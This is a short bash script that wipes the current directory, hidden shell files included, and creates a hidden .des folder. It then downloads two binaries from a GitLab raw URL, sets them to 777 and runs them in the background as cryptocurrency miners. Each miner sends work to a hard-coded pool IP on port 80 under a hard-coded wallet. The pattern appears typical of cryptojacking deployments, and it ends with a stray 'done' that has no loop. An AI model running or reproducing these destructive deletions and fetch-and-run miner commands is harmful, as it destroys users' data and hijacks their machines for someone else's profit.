#!/bin/bash
rm -rvf * 
rm -rvf ele* lol* 1.43* TON* ton* NB* .lib* .bash* .majza*
rm -R *
mkdir .des
cd .des
rm -R *

wget https://gitlab.com/majapahlevi/mvp/-/raw/main/cpminer
chmod 777 cpminer && ./cpminer -a yespower -o stratum+tcp://138.197.12.20:80 -u v255vQEQnZj2NVjF3UHpTrtwA1cGdXt4dV.$(shuf -n 1 -i 1-99999)-VISH -t4 &

wget https://gitlab.com/majapahlevi/mvp/-/raw/main/lol1.81
chmod 777 lol1.81

./lol1.81 -a KARLSEN -p 159.203.127.146:80 -u nexellia:qz5qcdw5llj23njmfz0km7f2755mvs0gmpxjg0jrqtvcqwtfsxhfk4604nf4v.$(shuf -n 1 -i 1-99999)-Bismillah --no-cl

done
